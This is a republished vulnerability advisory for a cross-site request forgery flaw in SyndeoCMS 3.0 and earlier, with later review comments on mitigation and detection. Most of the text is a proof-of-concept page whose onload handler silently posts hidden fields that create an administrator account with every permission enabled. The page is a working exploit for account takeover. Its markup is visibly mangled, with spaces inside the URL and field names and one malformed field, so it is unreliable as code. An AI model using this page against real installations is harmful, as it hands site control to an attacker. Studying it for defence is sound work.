Title: SyndeoCMS <= 3.0 CSRF Vulnerability
By Ivano Binetti (http://ivanobinetti.com)
Program Development Site: http://www.syndeocms.org/
Project page (SourceForge): http://sourceforge.net/projects/syndeocms
Affected Versions: 3.0 and earlier
Test System Platform: Debian Squeeze (6.0)
+ -------------- + [Add an administrator account by Ivano Binetti] --------------------- +
<!--
  Proof-of-concept page from the advisory: cross-site request forgery (CSRF)
  against the SyndeoCMS user-management form (3.0 and earlier, per the
  advisory header).

  What the markup shows: a single POST form made up only of hidden fields,
  submitted by the body's onload handler. None of the fields is a per-session
  or per-request secret; per the advisory, the request is accepted on the
  strength of the session cookie that the browser of a logged-in
  administrator attaches by itself.

  Defensive notes:
    * Mitigation: tie state-changing admin requests such as save_user to an
      unpredictable per-session token that is verified server-side; set the
      SameSite attribute on the session cookie; reject requests whose
      Origin/Referer is not the CMS itself; ask for the current admin
      password before users are created or edited.
    * Detection: audit the user list for accounts nobody created, and review
      web-server logs for POSTs carrying modoption=save_user with an
      off-site Referer.

  NOTE(review): the listing looks mangled by extraction or machine
  translation (capitalised tags, stray spaces inside the URL and the field
  names), so it is not valid markup as shown.
-->
<Html>
<!-- onload submits the first form on the page as soon as it loads; nothing is clicked. -->
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> I'm adding ADMIN account </H2>
<!--
  The action is the CMS configuration/users request with modoption save_user
  and an empty user_id (presumably "create" rather than "edit"; confirm
  against the application).
  NOTE(review): the host in this URL appears to have been substituted by the
  site that republished the advisory; treat it as a placeholder for the
  tested installation, not as an affected system.
-->
<Form method = "POST" name = "form0" action = "http://www.bkjia.com/syndeocms/starnet/index. php? Option = configuration & suboption = users & modoption = save_user & user_id = ">
<!-- Account details carried by the forged request. -->
<Input type = "hidden" name = "fullname" value = "new_admin"/>
<Input type = "hidden" name = "username" value = "new_admin"/>
<Input type = "hidden" name = "password" value = "password"/>
<Input type = "hidden" name = "email" value = "admin@admin.com"/>
<Input type = "hidden" name = "editor" value = "2"/>
<Input type = "hidden" name = "sections" value = ""/>
<!--
  Every access_N field is set to 1. Presumably these are the per-area
  permission flags of the user form, so the account would receive all of
  them; confirm against the SyndeoCMS user editor.
-->
<Input type = "hidden" name = "access_1" value = "1"/>
<Input type = "hidden" name = "access_2" value = "1"/>
<Input type = "hidden" name = "access_13" value = "1"/>
<Input type = "hidden" name = "access_3" value = "1"/>
<Input type = "hidden" name = "access_4" value = "1"/>
<Input type = "hidden" name = "access_5" value = "1"/>
<Input type = "hidden" name = "access_6" value = "1"/>
<Input type = "hidden" name = "access_7" value = "1"/>
<Input type = "hidden" name = "access_8" value = "1"/>
<Input type = "hidden" name = "access_9" value = "1"/>
<Input type = "hidden" name = "access_16" value = "1"/>
<Input type = "hidden" name = "access_10" value = "1"/>
<Input type = "hidden" name = "access_11" value = "1"/>
<Input type = "hidden" name = "access_12" value = "1"/>
<Input type = "hidden" name = "access_14" value = "1"/>
<Input type = "hidden" name = "access_15" value = "1"/>
<!--
  m_access fields, likewise all set to 1 (presumably per-module permissions;
  confirm). The name suffixes are percent-encoded text as printed in the
  advisory.
-->
<Input type = "hidden" name = "m_access % 5B6% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B8% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B10% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B11% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B0% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B1% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B13% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B12% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B14% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B15% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B7% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B19% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B2% 5D" value = "1"/>
<!-- NOTE(review): the next name breaks the pattern of its neighbours; likely a transcription error in the page. -->
<Input type = "hidden" name = "m_access % 5f8% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B17% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B18% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B3% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B4% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B9% 5D" value = "1"/>
<Input type = "hidden" name = "m_access % 5B5% 5D" value = "1"/>
</Form>
</Body>